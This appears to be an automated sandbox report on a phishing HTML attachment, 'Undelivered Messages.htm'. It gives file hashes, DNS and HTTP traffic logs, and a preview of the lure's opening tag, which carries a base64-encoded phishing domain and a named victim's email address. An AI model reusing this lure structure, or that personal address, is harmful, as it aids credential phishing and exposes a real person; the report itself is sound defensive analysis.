Source: global traffic	HTTP traffic detected: GET /jsnom.js HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jsnom.js HTTP/1.1Host: fiveradio-newbam.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: fiveradio-newbam.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SysEx File - GreyMatter
Category:	dropped
Size (bytes):	75076
Entropy (8bit):	5.536878116224829
Encrypted:	false
SSDEEP:	1536:BFJkJ9UJ9Gor+SRTpV7rSEc2xgmmD6I7knvvTsnlPUBkVxC7M0x5vPrwz:7uiJcoi0TptOEcSg1D6IovvTsnlPFVxf
MD5:	EABBA602AD039867B52E30E3E59EDC38
SHA1:	FAC94381CB8BD64D6EE5247060A3A3103FCD6D56
SHA-256:	68EF948A4727C058ED027C201EED5F749A508AE2732518188043AF70E6E41E75
SHA-512:	6C3FB4155FB43A544A4847794511A903A2E2B0DEE2FAC6C6378C735D8194FF0D7B095DC28EFF96F01E42B97E3BAC6C68B88FE25D6520DFAB131ACFDCF88ADFAC
Malicious:	false
Reputation:	low
Preview:	............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.just-news.pro^..........0.8.@.R.yomeno.xyz^..........0.8.@.R.yellowblue.io^..........0.8.@.R.thubanoa.com^..........0.8.@.R.abh.jp^..........0.8.@.R.ad999.biz^..........0.8.@.R._468_60...........0.8.@.R.adrecover.com^..........0.8.@.R.pemsrv.com^..........0.8.@.R.mnaspm.com^.,........0.8.@.R.mysmth.net/nForum//ADAgent_.>...........worldstar.com0.8.@.R.js.assemblyexchange.com/wana..(........0.8.@.R.ogads-pa.googleapis.com^..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^.(........0.8.@.R.shikoku-np.co.jp/img/ad/..........0.8.@.R./banner.cgi?..........0.8.@.R./in/track?data=.!......0.8.@.R.linkbucks.com/tmpl/..........0.8.@.R.clicktripz.com^..........0.8.@.R.-ad-manager/........0.8.@.R.files.slack.com^.$........0.8.@.R.admitad-connect.com^.2........0.8.@.R"cloudfront.net/js/common/invoke.js..........0.8.@.R./300-2

File type:	HTML document, ASCII text, with very long lines (695), with CRLF line terminators
Entropy (8bit):	5.384714489941515
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	Undelivered Messages.htm
File size:	7'228 bytes
MD5:	09f4170d3874b093d9f631589ce7f997
SHA1:	e5f203df8c12049ce3dcedd1193b55de2de2df55
SHA256:	a21a03467b36c167b4a58df8bd89dfeb2f060f442ed9805bfb873fc0a80db0fb
SHA512:	40cee60fa8f22c3a957620becb55f1b8e483158eb0d76051e6a2be98859c937f4df54aeeb4d25b50498631b80ad8c10992f1eb43a61985054c1942e8d05969db
SSDEEP:	96:xdL69rBj18eyJc2grvleB78IeEBe9pqwhx1mcjQBvXKTSi20n8kTT3+:xOYJcfrvleB78IeEwPqOkcQKT+Qu
TLSH:	C5E1940B5C88A6D4D37D7320AD268806E7A3E8E792454563BE6C78C02F7542DDE9EF70
File Content Preview:	<!DOCTYPE html>..<html point="aHR0cHM6Ly9maXZlcmFkaW8tbmV3YmFtLmNvbQ==" id="html" sti="VlZORlVqRTNNRFF5TURJMFZVNUpVVlZGTVRFeE9UQTBNVGN3TURJd01qUXlNREkwTURReE56RTVNVEV3TUE9PQ==" vic="fabian.courtine@swissquote.com" lang="en">....<head>....</head>....<body

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:14:49.598226070 CET	53	64317	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:49.614027023 CET	62832	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:49.614139080 CET	57122	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:49.614794016 CET	51874	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:49.614995003 CET	62209	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:49.620625973 CET	53	64248	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:49.622833014 CET	53	57122	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:49.625487089 CET	53	62832	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:49.627213001 CET	53	62209	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:49.649530888 CET	53	51874	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.848455906 CET	53	60441	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.875227928 CET	57308	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.875493050 CET	60327	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.886553049 CET	53	60327	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.890429974 CET	53	57308	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.967853069 CET	56432	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.967973948 CET	53352	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.973263979 CET	65042	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.973413944 CET	52031	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:50.975059032 CET	53	56432	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.976171017 CET	53	53352	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.980281115 CET	53	52031	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:50.984586000 CET	53	65042	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:53.807235003 CET	64012	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:53.807365894 CET	54050	53	192.168.2.4	1.1.1.1
Jan 10, 2025 11:14:53.814733028 CET	53	64012	1.1.1.1	192.168.2.4
Jan 10, 2025 11:14:53.814779043 CET	53	54050	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:01.986418962 CET	53	49253	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:05.049580097 CET	138	138	192.168.2.4	192.168.2.255
Jan 10, 2025 11:15:07.783406973 CET	53	61039	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:26.595180988 CET	53	55471	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:49.173140049 CET	53	57420	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:49.191543102 CET	53	52039	1.1.1.1	192.168.2.4
Jan 10, 2025 11:15:51.249883890 CET	53	62833	1.1.1.1	192.168.2.4
Jan 10, 2025 11:16:18.892679930 CET	53	65045	1.1.1.1	192.168.2.4
Jan 10, 2025 11:16:54.283632040 CET	53	49684	1.1.1.1	192.168.2.4
Jan 10, 2025 11:17:04.923624992 CET	53	63426	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:14:50 UTC	510	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-10 10:14:50 UTC	702	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Sun, 06 Oct 2024 08:56:16 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: fra1::kf799-1728204976355-66fe9052d9c9 X-Cache: Hit from cloudfront Via: 1.1 7b85fc567b776c0d31c5ac07cc6c2ae6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: dKsVycrewq6XXRfH64EU2ge9758mBd4P2NumKhZjfXMSqB_otmQ7Bg== Age: 9477321
2025-01-10 10:14:50 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2025-01-10 10:14:50 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2025-01-10 10:14:50 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:14:50 UTC	492	OUT	GET /jsnom.js HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-10 10:14:50 UTC	803	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:14:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stcfEbrWmv4Q01B7ItBb8bFNbOn9mDEPJWIv2Xh3FZwCXnW9i5STS23l%2BTSBgiDQST321SfB5Q1BlxREkQnTY%2BWrX1QgRlCwlwpgpvpDJl2qypos4sOV%2BJgeRV%2BrQNIif6QnHkxmOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffbe7082a4b1885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1657&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1070&delivery_rate=1762220&cwnd=193&unsent_bytes=0&cid=db8474cd0c9d765e&ts=145&x=0"
2025-01-10 10:14:50 UTC	566	IN	Data Raw: 31 32 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1281<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-01-10 10:14:50 UTC	1369	IN	Data Raw: 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e Data Ascii: x, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.
2025-01-10 10:14:50 UTC	1369	IN	Data Raw: 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 67 67 65 64 20 61 73 20 70 68 69 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 61 63 71 75 69 72 65 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f 72 74 68 79 20 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 Data Ascii: link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GE
2025-01-10 10:14:50 UTC	1369	IN	Data Raw: 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 62 65 37 30 38 32 61 34 62 31 38 38 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 Data Ascii: er sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ffbe7082a4b1885</strong></span> <span class="cf-footer-separator
2025-01-10 10:14:50 UTC	72	IN	Data Raw: 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ript> window._cf_translation = {}; </script></body></html>
2025-01-10 10:14:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:14:51 UTC	359	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-10 10:14:51 UTC	702	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Sun, 06 Oct 2024 08:56:16 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: fra1::kf799-1728204976355-66fe9052d9c9 X-Cache: Hit from cloudfront Via: 1.1 f99e0a5708c6297d4aa91b3e4794707e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: ggG0I2WexR1e2KQjsHXlw3aznhCIoaPS7pDPy-0dP6okUvot2iLcLg== Age: 9477322
2025-01-10 10:14:51 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2025-01-10 10:14:52 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2025-01-10 10:14:52 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:14:51 UTC	553	OUT	OPTIONS /report/v4?s=stcfEbrWmv4Q01B7ItBb8bFNbOn9mDEPJWIv2Xh3FZwCXnW9i5STS23l%2BTSBgiDQST321SfB5Q1BlxREkQnTY%2BWrX1QgRlCwlwpgpvpDJl2qypos4sOV%2BJgeRV%2BrQNIif6QnHkxmOg%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fiveradio-newbam.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-10 10:14:51 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Fri, 10 Jan 2025 10:14:51 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
